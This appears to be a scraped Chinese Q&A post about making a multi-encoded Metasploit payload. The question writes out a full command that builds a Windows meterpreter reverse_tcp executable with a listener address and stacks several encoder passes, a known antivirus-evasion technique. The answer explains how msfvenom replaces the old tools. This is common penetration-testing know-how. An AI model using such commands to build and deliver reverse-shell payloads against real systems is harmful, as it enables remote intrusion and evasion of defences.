【问题标题】:how to generate multi encode payload using metasploit如何使用 metasploit 生成多编码有效负载
【发布时间】:2015-08-13 07:54:13
【问题描述】:

在之前版本的 metasploit 中,我们可以使用这段代码来生成多重编码负载:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe

但是 msfvenom 在新版本中被替换了... 我如何通过 msfvenom 制作多编码有效载荷? 抱歉英语不好

【问题讨论】:

    标签: metasploit


    【解决方案1】:

    您可以在脚本中用“msfvenom”“替换 msfpayload 和 msfencode”

    和“-i”而不是“-c”表示迭代次数或编码有效载荷的时间

    你可以在终端输入

    msfvenom

    msfvenom -h

    如果你知道 msfpayload & encode,你应该可以毫无问题地使用 msfvenom,机制相同

    更多请参考

    https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

    希望你能找到你要找的东西!

    【讨论】:

      猜你喜欢
      • 2011-12-17
      • 2022-10-13
      • 2023-04-07
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2012-05-10
      • 2020-08-29
      • 2021-04-20
      相关资源
      最近更新 更多